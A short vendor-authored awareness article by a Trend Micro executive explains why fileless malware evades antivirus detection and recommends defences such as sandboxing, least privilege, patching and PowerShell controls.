Fileless malware has become a significant threat, and what makes this kind of malware particularly nasty is how difficult it is to detect.
By Indi Siriniwasa, vice-president of Trend Micro SSA
Because these attacks are so sneaky and hard to find, it makes the malware increasingly popular among hackers. What’s more, these attacks are on the rise – because they get results.
The malware manages to dodge detection because its payload is hidden in the far flung places, such as the RAM or kernel because there are no hard drive files that need to run. When malware detection is run on the computer, it won’t find anything to flag, because the malware is not on the system.
This works wonderfully for the hacker as their point of entry is essentially invisible and they can go about their business – whether that’s stealing passwords or data or corporate espionage – undetected. AV and machine learning AV would be on the lookout for executable files and would completely miss the malware because it’s written directly onto the disk.
It could be said that this specific type of malware causes the system to effectively attack itself. The malware hides in parts of the computer that the regular user won’t think of checking or even know how to get to. Yes, it is possible to get rid of the malware, but many companies and organisations have not even begun to turn the spotlight on fileless malware.
Once the breach has taken place, it may take a while before anyone has noticed the damage caused. The fileless attack can make the browser run malicious code or use the Microsoft PowerShell utility using specifically designed scripts. Once the attacker is in, a command is executed and the hacker has access.
With fileless malware only now becoming mainstream, it could be a challenging prospect for any business or organisation to face. How do you protect your network from what is invisible?
Enabling a custom sandbox along with implementing a principle of least privilege can help to prevent attacks. It is important to apply all the latest patches as well, not to mention adopting protocols for the use of PowerShell. Entry points need to be secured and monitoring behaviour are also recommended.
It appears that fileless malware is the direction in which cyber attacks may be heading, and it is essential that the highest levels of vigilance and security be employed. Awareness that fileless malware exists is the very first step. It’s a particularly nasty and dangerous form of cyber attack, and keeping a keen eye on activity, behaviour and what’s happening on your system, will help you to get ahead of attack.